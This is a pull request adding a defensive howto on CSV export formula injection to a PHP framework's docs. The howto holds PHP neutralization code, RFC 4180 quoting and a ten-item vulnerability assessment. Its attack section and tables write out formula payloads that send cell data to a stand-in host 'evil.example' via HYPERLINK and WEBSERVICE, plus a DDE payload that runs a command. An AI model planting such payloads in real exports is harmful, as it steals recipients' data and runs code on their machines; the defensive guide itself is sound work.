### PR TITLE
docs(howto): FT351 CSV エクスポート数式インジェクション防止 howto を追加（VULN） (#1339)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -18,6 +18,13 @@ Versioning follows [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
 ---
 
+## [1.5.325] — 2026-05-29
+
+### Added
+- `docs/howto/csv-export-formula-injection.md` — FT351 csvexport (VULN) 新規作成: CSV/表計算エクスポートの数式インジェクション防止 howto: 先頭 `= + - @` タブ/CR の中和・RFC 4180 クォート・Content-Disposition ファイル名インジェクション・V-01〜V-10 脆弱性診断 (#1339)
+
+---
+
 ## [1.5.324] — 2026-05-29
 
 ### Added

--- a/docs/howto/README.md
+++ b/docs/howto/README.md
@@ -100,7 +100,7 @@ Auto-generated from each guide's frontmatter (`category` / `difficulty` / `tags`
 | [TOTP 二要素認証の実装ガイド](totp-authentication.md) | advanced | `totp` `two-factor` `otp` `authentication` |
 | [User Invitation System](user-invitation.md) | intermediate | `invitation` `token` `expiry` `email` |
 
-### Security (34)
+### Security (35)
 
 | Guide | Difficulty | Tags |
 |---|---|---|
@@ -134,6 +134,7 @@ Auto-generated from each guide's frontmatter (`category` / `difficulty` / `tags`
 | [HOWTO: Audit Trail — Recording Who Changed What](audit-trail.md) | intermediate | `audit-trail` `immutable-log` `jwt` `change-tracking` `compliance` |
 | [Mass Assignment Defence](mass-assignment.md) | beginner | `mass-assignment` `dto` `whitelist` `input-validation` |
 | [Personal Data Export](personal-data-export.md) | intermediate | `gdpr` `data-export` `pii` `download-token` `expiry` |
+| [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md) | intermediate | `csv` `formula-injection` `export` `sanitization` `rfc-4180` |
 | [Signed URLs](signed-urls.md) | intermediate | `signed-url` `hmac` `presigned` `time-limited` `token` |
 | [SQL injection defense](sql-injection.md) | intermediate | `sql-injection` `pdo` `validation` |
 | [URL Shortener API & SSRF Prevention](url-shortener-ssrf.md) | advanced | `ssrf` `url-shortener` `vulnerability-assessment` |

--- a/docs/howto/by-tag.md
+++ b/docs/howto/by-tag.md
@@ -518,9 +518,10 @@ Auto-generated from each guide's frontmatter `tags`. Regenerate with `composer h
 
 - [CSRF and JSON APIs](csrf-and-json-api.md)
 
-## `csv` (1)
+## `csv` (2)
 
 - [CSV バルクインポート API の実装ガイド](csv-bulk-import.md)
+- [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md)
 
 ## `curated-lists` (1)
 
@@ -812,6 +813,10 @@ Auto-generated from each guide's frontmatter `tags`. Regenerate with `composer h
 - [User Invitation System](user-invitation.md)
 - [クーポン・プロモコード管理](coupon-promo-code.md)
 
+## `export` (1)
+
+- [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md)
+
 ## `fault-tolerance` (1)
 
 - [How-to: Circuit Breaker](circuit-breaker.md)
@@ -876,6 +881,10 @@ Auto-generated from each guide's frontmatter `tags`. Regenerate with `composer h
 
 - [How to Build a User Follow System with NENE2](user-follow-system.md)
 - [How-to: Follow / Unfollow API](follow-api.md)
+
+## `formula-injection` (1)
+
+- [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md)
 
 ## `fts5` (2)
 
@@ -1985,6 +1994,10 @@ Auto-generated from each guide's frontmatter `tags`. Regenerate with `composer h
 - [How-to: API Token Lifecycle Management](token-lifecycle-api.md)
 - [How-to: Session / Token Management API (ATK-01~12)](session-token-management.md)
 
+## `rfc-4180` (1)
+
+- [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md)
+
 ## `role-hierarchy` (1)
 
 - [How-to: Group Member Management](group-member-management.md)
@@ -2017,6 +2030,10 @@ Auto-generated from each guide's frontmatter `tags`. Regenerate with `composer h
 ## `running-total` (1)
 
 - [Use SQLite Window Functions](use-window-functions.md)
+
+## `sanitization` (1)
+
+- [Prevent CSV / Spreadsheet Formula Injection on Export](csv-export-formula-injection.md)
 
 ## `scheduling` (4)
 

--- a/docs/howto/csv-export-formula-injection.md
+++ b/docs/howto/csv-export-formula-injection.md
@@ -1,0 +1,211 @@
+---
+title: "Prevent CSV / Spreadsheet Formula Injection on Export"
+category: security
+tags: [csv, formula-injection, export, sanitization, rfc-4180]
+difficulty: intermediate
+related: [csv-bulk-import, data-export-api, sql-injection]
+---
+
+# Prevent CSV / Spreadsheet Formula Injection on Export
+
+When your API exports user-supplied data as CSV, the danger is not on your server — it is on the **recipient's spreadsheet**. Excel, Google Sheets, and LibreOffice treat a cell whose text begins with `=`, `+`, `-`, `@`, a tab (`\t`), or a carriage return (`\r`) as a **formula**. An attacker who can get a string like `=cmd|'/c calc'!A0` or `=HYPERLINK("https://evil.example/?"&A1)` into your database will have it execute (DDE) or exfiltrate the row when an admin opens the exported file.
+
+This is **CSV injection** (a.k.a. formula injection). It is an *output-encoding* problem at the export boundary — distinct from [SQL injection](sql-injection.md) (a query problem) and from [CSV bulk import](csv-bulk-import.md) (an input problem).
+
+**Prerequisite**: You have an endpoint that returns rows as CSV.
+
+---
+
+## 1. The attack
+
+Store this as a perfectly valid "display name", then export the table to CSV and open it in Excel:
+
+```
+=HYPERLINK("https://evil.example/leak?d="&A1&A2, "Click for refund")
+```
+
+- `=...HYPERLINK...` — exfiltrates neighbouring cells to an attacker URL when clicked.
+- `=WEBSERVICE("https://evil.example/?"&A1)` — exfiltrates **with no click** in older Excel.
+- `=cmd|'/c calc'!A0` — DDE; can run a local command after a confirmation dialog.
+
+None of this touches your server. Your validation passed, your SQL was parameterized — and you still shipped a working exploit inside a "valid" CSV.
+
+---
+
+## 2. The fix: neutralize the leading character
+
+The OWASP-recommended baseline: if a cell value starts with a dangerous character **and is not a plain number**, prefix it with a single quote (`'`). Excel then renders the cell as literal text.
+
+```php
+/**
+ * Neutralize a value before writing it to a CSV cell so spreadsheet
+ * software cannot interpret it as a formula.
+ */
+function neutralizeCsvCell(string $value): string
+{
+    if ($value === '') {
+        return $value;
+    }
+    $dangerous = ['=', '+', '-', '@', "\t", "\r"];
+    // Keep genuine numbers (incl. negatives like -50) intact; only quote
+    // values that *start* dangerous and are not numeric.
+    if (in_array($value[0], $dangerous, true) && !is_numeric($value)) {
+        return "'" . $value;
+    }
+
+    return $value;
+}
+```
+
+The `!is_numeric()` guard is the part most implementations get wrong: blindly prefixing every `-`/`+` turns the legitimate number `-50` into the text `'-50`, breaking sums in the recipient's sheet. Numbers pass through; only formula-shaped strings get quoted.
+
+---
+
+## 3. Combine with RFC 4180 quoting
+
+Neutralization handles formulas; you still need correct quoting so values containing commas, quotes, or newlines do not break the column structure (a separate injection vector). Let `fputcsv` do it, with `escape=""` for strict [RFC 4180](https://www.rfc-editor.org/rfc/rfc4180) behaviour (no backslash escaping):
+
+```php
+$fp = fopen('php://temp', 'r+');
+foreach ($rows as $row) {
+    fputcsv($fp, array_map('neutralizeCsvCell', $row), ',', '"', '');
+}
+rewind($fp);
+$csv = stream_get_contents($fp);
+```
+
+Input → output (verified):
+
+```
+=1+1                       → '=1+1
++budget                    → '+budget
+@home                      → '@home
+-50                        → -50            (real number, untouched)
+=cmd|'/c calc'!A0          → "'=cmd|'/c calc'!A0"
+a,b                        → "a,b"
+he said "hi"               → "he said ""hi"""
+```
+
+> `escape=""` matters: PHP's historical default escape character (`\`) produces output that is **not** RFC 4180 and that Excel mis-parses. Always pass `""`.
+
+---
+
+## 4. Return it as a download response
+
+Build the PSR-7 response in the handler. Two more header-level details matter:
+
+```php
+$filename = 'export-' . date('Ymd') . '.csv';
+
+return $responseFactory->createResponse(200)
+    ->withHeader('Content-Type', 'text/csv; charset=UTF-8')
+    // Sanitize the filename: strip CR/LF/quotes so it cannot inject extra headers.
+    ->withHeader('Content-Disposition', 'attachment; filename="'
+        . preg_replace('/[\r\n"]/', '', $filename) . '"')
+    ->withBody($streamFactory->createStream("\u{FEFF}" . $csv));
+```
+
+- **`Content-Disposition: attachment`** forces a download instead of letting the browser render the bytes (defends against content sniffing).
+- **`filename` sanitization** — never interpolate a user-controlled name without stripping `\r`, `\n`, and `"`; otherwise it becomes a header-injection vector.
+- **BOM (`\u{FEFF}`)** — optional; makes Excel open UTF-8 correctly. It does not affect the injection defense.
+
+Keep the neutralization in the export layer (a small `CsvWriter` value object), not scattered across handlers — the same guarantee then covers every export endpoint.
+
+---
+
+## Vulnerability Assessment
+
+### V-01 — Formula injection via leading `=` ✅ SAFE
+
+**Risk**: A stored value like `=1+1` or `=HYPERLINK(...)` executes when the CSV is opened.
+**Finding**: SAFE — `neutralizeCsvCell()` prefixes `'`, so the cell is rendered as text (`'=1+1`).
+
+---
+
+### V-02 — DDE command execution (`=cmd|...`) ✅ SAFE
+
+**Risk**: `=cmd|'/c calc'!A0` triggers DDE and can run a local command.
+**Finding**: SAFE — the payload starts with `=` and is not numeric, so it is quoted (`"'=cmd|'/c calc'!A0"`).
+
+---
+
+### V-03 — Data exfiltration via `WEBSERVICE`/`HYPERLINK` ✅ SAFE
+
+**Risk**: `=WEBSERVICE("https://evil/?"&A1)` leaks neighbouring cells, sometimes without a click.
+**Finding**: SAFE — neutralized identically; the leading `=` is defused before the function name is reached.
+
+---
+
+### V-04 — Leading `+`, `-`, `@` triggers ✅ SAFE
+
+**Risk**: Excel also evaluates cells beginning with `+`, `-`, and `@`.
+**Finding**: SAFE — all four are in the `$dangerous` set; `+budget` → `'+budget`, `@home` → `'@home`.
+
+---
+
+### V-05 — Tab / carriage-return prefix bypass ✅ SAFE
+
+**Risk**: A leading `\t` or `\r` is stripped by some parsers, exposing a `=` underneath (`\t=1+1`).
+**Finding**: SAFE — `\t` and `\r` are themselves in the `$dangerous` set, so the whole cell is quoted before any stripping.
+
+---
+
+### V-06 — Column break via comma / quote / newline ✅ SAFE
+
+**Risk**: A value like `a,b` or an embedded `"`/newline shifts data into the wrong columns (structural injection).
+**Finding**: SAFE — `fputcsv(..., escape: '')` applies RFC 4180 quoting (`"a,b"`, `"he said ""hi"""`).
+
+---
+
+### V-07 — `Content-Disposition` filename header injection ✅ SAFE
+
+**Risk**: A user-controlled export name containing `\r\n` injects additional response headers.
+**Finding**: SAFE — the filename is passed through `preg_replace('/[\r\n"]/', '', ...)` before being placed in the header.
+
+---
+
+### V-08 — Content sniffing / inline rendering ✅ SAFE
+
+**Risk**: Without `attachment`, a browser may render the CSV as HTML and execute embedded markup.
+**Finding**: SAFE — `Content-Type: text/csv` + `Content-Disposition: attachment` force a download.
+
+---
+
+### V-09 — Legitimate negative numbers mangled ✅ SAFE (correctness)
+
+**Risk**: Over-eager neutralization turns `-50` into text `'-50`, corrupting downstream sums.
+**Finding**: SAFE — the `!is_numeric()` guard lets well-formed numbers (`-50`, `+1`, `-5e3`) pass through untouched.
+
+---
+
+### V-10 — Defense centralization ✅ SAFE
+
+**Risk**: Per-handler ad-hoc CSV building lets one endpoint forget the neutralization.
+**Finding**: SAFE (by design) — neutralization lives in a single export layer applied via `array_map`, so every column of every export is covered.
+
+---
+
+### VULN Summary
+
+| ID | Vulnerability | Finding |
+|----|---------------|---------|
+| V-01 | Formula injection (`=`) | ✅ SAFE |
+| V-02 | DDE command execution | ✅ SAFE |
+| V-03 | `WEBSERVICE`/`HYPERLINK` exfiltration | ✅ SAFE |
+| V-04 | `+` / `-` / `@` triggers | ✅ SAFE |
+| V-05 | Tab / CR prefix bypass | ✅ SAFE |
+| V-06 | Comma / quote / newline column break | ✅ SAFE |
+| V-07 | Filename header injection | ✅ SAFE |
+| V-08 | Content sniffing / inline render | ✅ SAFE |
+| V-09 | Negative-number mangling | ✅ SAFE |
+| V-10 | Defense centralization | ✅ SAFE |
+
+**10 SAFE, 0 EXPOSED.** No critical findings. The neutralize-leading-character rule (with a numeric guard) plus RFC 4180 quoting and an `attachment` download response closes the CSV-injection surface. The one residual caveat is human: the neutralizing `'` is visible as a leading apostrophe in some non-spreadsheet CSV parsers — acceptable, since the alternative is code execution in the recipient's spreadsheet.
+
+---
+
+## Related
+
+- [CSV bulk import](csv-bulk-import.md) — the input side (partial success, duplicate detection)
+- [Data export API](data-export-api.md) — async token-protected export flow
+- [SQL injection defense](sql-injection.md) — the query-side injection class

--- a/docs/openapi/openapi.yaml
+++ b/docs/openapi/openapi.yaml
@@ -1,7 +1,7 @@
 openapi: 3.1.0
 info:
   title: NENE2 API
-  version: 1.5.324
+  version: 1.5.325
   description: >
     NENE2 API contract. This file is the source of truth for public JSON APIs.
 servers:

--- a/src/FrameworkInfo.php
+++ b/src/FrameworkInfo.php
@@ -11,7 +11,7 @@ namespace Nene2;
  */
 final readonly class FrameworkInfo
 {
-    public const string VERSION = '1.5.324';
+    public const string VERSION = '1.5.325';
 
     public function name(): string
     {


### PR DESCRIPTION
## 目的

VULN サイクル（6件ごと: ...339, 345, **351**）の **FT351**。**CSV/表計算エクスポートの数式インジェクション（CSV injection / formula injection）** という未カバーの攻撃面を扱う。

既存の `csv-bulk-import.md`（入力側・部分成功）や `data-export-api.md`（GDPR 非同期フロー）とは別物の **出力エンコーディング問題**で、重複しない（事前に本文確認済み）。

## 変更点

- **`docs/howto/csv-export-formula-injection.md` 新規**（category: security）:
  - 攻撃: `=HYPERLINK`/`=WEBSERVICE` 流出・`=cmd|...` DDE
  - 防御: 先頭 `= + - @` タブ/CR の中和（**`!is_numeric()` ガードで `-50` 等の実数は保持** ← 実装が間違えやすい点）
  - RFC 4180 クォート（`fputcsv(..., escape: '')`）
  - `Content-Disposition` ファイル名インジェクション対策・`attachment` 強制・BOM
  - **V-01〜V-10 脆弱性診断**（§18 VULN テンプレート、10 SAFE / 0 EXPOSED）
- `composer howto:index` で README（Security）/ `by-tag.md` 再生成。
- バージョン **1.5.325**。

## 検証

- **中和ロジック・CSV 出力を PHP で実行確認**（howto の入出力表は実出力をそのまま使用）。
- `composer check` 全通過（version 1.5.325）。
- `composer howto:frontmatter -- --require-all` → 258/258 passed。
- `composer howto:index` idempotent。

Self-review: docs-policy

Closes #1339